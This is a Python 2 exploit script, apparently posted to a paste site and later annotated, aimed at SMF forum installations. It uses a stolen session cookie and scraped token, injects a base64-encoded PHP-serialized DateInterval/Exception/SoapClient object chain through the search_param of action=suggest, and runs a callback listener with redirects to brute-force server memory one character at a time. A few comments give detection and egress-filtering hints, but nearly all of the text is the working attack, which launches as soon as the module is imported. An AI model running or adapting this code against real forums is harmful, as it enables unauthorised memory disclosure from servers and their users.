dcomicboy

still hate python

Oct 5th, 2015
  1. import sys, requests, time, os, socket, thread, base64, string, urllib
  2. from multiprocessing import Process
  3.  
#Payload Config
# Both values are left as the placeholder 000 (octal zero) and must be set
# before the script does anything useful.
bytes_num = 000 #num of bytes to dump
address = 000 #starting memory address

#Target Config
# The session cookie is the only credential used; getToken() treats the
# presence of an "action=logout;" link in the index page as proof the
# session is authenticated.
cookie = {'PHPSESSID' : '000'} #SMF session cookie
target_host = 'http://forum/forum/index.php' #URL of target installation index.php
csrftoken = '' # populated by getToken()

#Local Server Config
# serverStart() listens here and the script expects the remote host to connect
# back to this address; the same host/port pair is embedded in the payload as
# _proxy_host/_proxy_port (see forgePayload). From a defender's side, the
# web tier initiating outbound TCP connections to an arbitrary port is the
# observable signal, and egress filtering on that tier breaks the callback.
host = "localhost"
port = 31337

#Memory dump variables
dumped = ''         # all recovered characters; pushDumped() prepends because address counts down
current_dump = ''   # the run of characters currently being extended; cleared on a non-match
in_string = False   # whether the previous recovered character continued a run
brute_index = 0     # index into brute_list of the guess currently being tried
brute_list = list(string.ascii_letters + string.digits)  # guess alphabet is [A-Za-z0-9] only
# Canned HTTP responses written back to the callback connection. NOTE(review):
# the redirect status line says "302 OK" rather than "302 Found"; whether the
# remote client accepts it is not visible from this script.
r_ok = 'HTTP/1.0 200 OK' + '\n'
r_re = 'HTTP/1.0 302 OK' + '\n'
# Headers plus SOAP envelope body. Content-Length is a fixed 395 and is not
# recomputed from the text below; the literal is runtime data and is kept as-is.
r_body = '''Server: Truel-Server
Content-Type: text/xml
Connection: keep-alive
Content-Length: 395

<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
<env:Header>
 <n:alertcontrol xmlns:n="http://example.org/alertcontrol">
  <n:priority>1</n:priority>
  <n:expires>2001-06-22T14:00:00-05:00</n:expires>
 </n:alertcontrol>
</env:Header>
<env:Body>
 <m:alert xmlns:m="http://example.org/alert">
  <m:msg>Truel</m:msg>
 </m:alert>
</env:Body>
</env:Envelope>'''
  43.  
  44.  
def serverStart():
    """Bind a TCP listener on (host, port) with SO_REUSEADDR and return it.

    The returned socket is passed to getSoapRequest(), which accepts the
    callback connections one at a time (backlog of 1).
    """
    print "[+] Setting up local server on port " + str(port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Dead check: socket.socket() raises on failure instead of returning a
    # falsy value, and even if it ran the code would fall through to bind().
    if not sock:
        print "[X] Fatal Error: Unable to create socket"
    sock.bind((host, port))
    sock.listen(1)
    return sock
  54.  
def getToken():
    """Scrape the session token from the logout link of the forum index page.

    Up to three GETs are made with the configured cookie; the first response
    containing "action=logout;" ends the loop. On success the module-level
    csrftoken is set and True is returned. Otherwise an error is printed and
    False is returned, which the script interprets as an unauthenticated
    PHPSESSID.
    """
    global csrftoken
    print "[+] Trying to get a valid CSRF token"
    for n in range(3): #3 attempts
        r = requests.get(target_host, cookies=cookie, allow_redirects=False)
        r = r.text
        if(r.find("action=logout;")!=-1):
            break
    start = r.find("action=logout;")
    if (start !=-1):
        # The token is the text between "action=logout;" (14 chars) and the
        # next '">'. If that closing quote is missing, find() returns -1 and
        # the slice silently yields a truncated token instead of failing.
        end = (r[start+14:]).find('">')
        csrftoken = r[start+14 : start+end+14]
        print "[+] Authentication done. Got token " + str(csrftoken)
        return True
    else:
        print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
        return False
  72.  
def prepareForExploit():
    """Fetch the token, then issue one warm-up GET to action=suggest.

    Terminates the process with os._exit(1) (no cleanup, no flushing) when
    getToken() fails. The warm-up response is discarded; the inline comment
    calls the request necessary but the reason is not visible in this file.
    """
    if not(getToken()): #get CSRF token
        os._exit(1)
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
    r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request
    return
  79.  
def forgePayload(current_try, address):
    """Return the PHP-serialized object string sent by sendPayload().

    The literal nests DateInterval -> Exception -> SoapClient. Of the
    SoapClient fields, `location` is set to "http://" + current_try,
    `_proxy_host`/`_proxy_port` point at this script's listener, and the
    `_cookies` entry named "owned" carries `address` twice as integers. What
    the remote side does with these fields is not shown here. Lengths are
    computed with len() so the serialized string stays self-consistent.

    Detection note: the payload is base64-encoded into the search_param query
    string, so a decoded value beginning with 'O:12:"DateInterval"' is a
    high-fidelity log/WAF indicator for this particular script.
    """
    location = "http://" + current_try
    payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'
    return payload
  84.  
def sendPayload(payload,null):
    """GET action=suggest with the base64-encoded payload in search_param.

    `null` is never read; it only exists so thread.start_new_thread() can be
    given a two-element args tuple. The HTTP response is discarded. A
    RequestException kills the whole process with os._exit(1) -- from a worker
    thread, so the main thread blocked in accept() gets no chance to clean up.
    """
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens
    try:
        r = requests.get(target, cookies=cookie, allow_redirects=False)
    except requests.exceptions.RequestException:    
        print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
        os._exit(1)
    return
  93.  
def limitReached(dumped):
    """Return True once `dumped` holds at least bytes_num characters.

    The parameter shadows the module-level `dumped`; callers pass the global in.
    """
    if(len(dumped) >= bytes_num):
        return True
    else:
        return False
  99.  
def printDumped(dumped):
    """Print `dumped` 48 characters per line, each line indented four spaces.

    The loop runs over range(bytes_num), not len(dumped), so it relies on the
    caller having checked limitReached() first; otherwise dumped[i] raises
    IndexError. The trailing partial line is flushed when cnt == bytes_num,
    which means a dump whose length is a multiple of 48 is printed twice on
    its last line.
    """
    d = "    "
    cnt = 1
    print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
    print "[+] ======================= Dumped Data ======================="
    for i in range(bytes_num):
        d = d + str(dumped[i])
        if (cnt % 48 == 0):
            print d
            d = "    "
        if (cnt == bytes_num):
            print d
        cnt = cnt + 1
  113.  
def getSoapRequest(sock):
    """Accept one callback connection and return (connection, first_chunk).

    A single recv(8192) is issued; a request that arrives in more than one
    segment is only partially read. The peer address (`sender`) is ignored.
    """
    connection, sender = sock.accept()
    request = connection.recv(8192)
    return (connection, request)
  118.  
def sendSoapResponse(connection, content):
    """Write `content` to the connection and close it.

    Uses send() rather than sendall(), so a short write would go unnoticed.
    """
    connection.send(content)
    connection.close()
    return
  123.  
def getDumpedFromHost(request):
    """Return the single character that follows "Host: " in the raw request.

    If the header is absent, find() returns -1, i becomes 5, and the slice
    silently returns a character from the request line instead of signalling
    failure.
    """
    i = request.find("Host: ") + 6
    v = request[i:i+1]
    return v
  128.  
def pushDumped(value, string):
    """Record one recovered character and advance the dump state.

    `value` is prepended to the module-level `dumped` (the walk moves to lower
    addresses, so prepending keeps the output in memory order). When `string`
    is true the character also extends `current_dump`; otherwise the run is
    reset. `address` is decremented and `brute_index` restarts at 0.

    NOTE(review): the parameter named `string` shadows the imported `string`
    module inside this function. Also, the address is printed after the
    decrement, so the label shown is one below the address `value` came from.
    """
    global dumped
    global current_dump
    global brute_index
    global address
    global in_string

    dumped = str(value) + str(dumped)
    if(string):
        current_dump = str(value) + str(current_dump)
    else:
        current_dump = ""
    in_string = string
    address = address-1
    brute_index = 0
    print "[" + hex(address) + "] " + str(value)
    return
  146.  
def bruteViaResponse(sock):
    """Drive up to 20 callback connections for the current guess cycle.

    Each accepted request is checked for the literal "owned" (the cookie name
    from forgePayload); its presence is treated as a hit, the character is
    pulled from the Host header via getDumpedFromHost(), a 200 response is
    sent and True is returned. Otherwise the next alphabet entry is selected
    (prefixed to current_dump when in_string is set) and a 302 whose Location
    is "http://" + that guess is returned so the client tries again. Returns
    False when the alphabet is exhausted, when the read request is empty
    (closed without a response), or when the 20th request is not a hit.

    `in_string` and `current_dump` are read as globals without a `global`
    statement, which is fine for reads only. Unlike the loop body, the final
    accept after the loop does not check for an empty request.

    Network view for defenders: the forum host issues a burst of outbound
    HTTP requests to one external listener, following redirects to
    single-character or short hostnames -- an unusual egress pattern.
    """
    global brute_index
    current_try = ""
    response_ok = r_ok + r_body

    for n in range(19):
        connection, request = getSoapRequest(sock)
        if not request:
            connection.close()
            return False
        if request.find("owned")!=-1:
            pushDumped(getDumpedFromHost(request), True)
            sendSoapResponse(connection,response_ok)
            return True
        else:
            if((brute_index+1) == len(brute_list)):
                sendSoapResponse(connection,response_ok)
                return False
            brute_index = brute_index + 1
        if not in_string:
            current_try = brute_list[brute_index]
        else:
            current_try = brute_list[brute_index] + str(current_dump)
        response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
        sendSoapResponse(connection,response_re)
    connection, request = getSoapRequest(sock)
    if request.find("owned")!=-1:
        pushDumped(getDumpedFromHost(request), True)
        sendSoapResponse(connection,response_ok)
        return True
    sendSoapResponse(connection,response_ok)
    return False
  179.  
def bruteViaRequest(sock):
    """Outer loop: send one payload per guess until bytes_num characters are dumped.

    Each iteration builds the payload for the current guess, fires the HTTP
    request from a separate thread (so the main thread can block in accept()
    inside bruteViaResponse), and bumps brute_index when that cycle reports
    no hit. When the alphabet is exhausted a "." placeholder is recorded for
    the character (it is outside [A-Za-z0-9]) and the string run is reset;
    pushDumped() also resets brute_index to 0, which is why the following
    brute_list[brute_index] lookup does not go out of range.

    The function returns from inside the loop once limitReached() is true,
    after printing the dump; the trailing `return` is unreachable. The
    worker threads are never joined.
    """
    global brute_index
    brute_index = 0
    current_try = ""

    while(True):    
        if(brute_index == len(brute_list)):
            pushDumped(".", False)
        if limitReached(dumped):
            printDumped(dumped)
            return
        if not in_string:
            current_try = brute_list[brute_index]
        else:
            current_try = brute_list[brute_index] + str(current_dump)
        payload = forgePayload(current_try,address)
        thread.start_new_thread(sendPayload,(payload,""))
        if not bruteViaResponse(sock):
            brute_index = brute_index + 1
    return
  200.  
def runExploit():
    """Entry point: start the listener, authenticate, run the dump, exit.

    The listening socket is opened before the token is fetched; a getToken()
    failure then leaves via os._exit(1) without closing it (the OS reclaims
    it). On the normal path the socket is closed and sys.exit(0) is called.
    """
    print "[+] Starting exploit"
    sock = serverStart()
    prepareForExploit()
    print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
    bruteViaRequest(sock)
    sock.close()
    print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
    sys.exit(0)
  210.  
  211.  
# Runs on import: there is no `if __name__ == "__main__":` guard, so merely
# importing this module starts the listener and the network activity.
runExploit()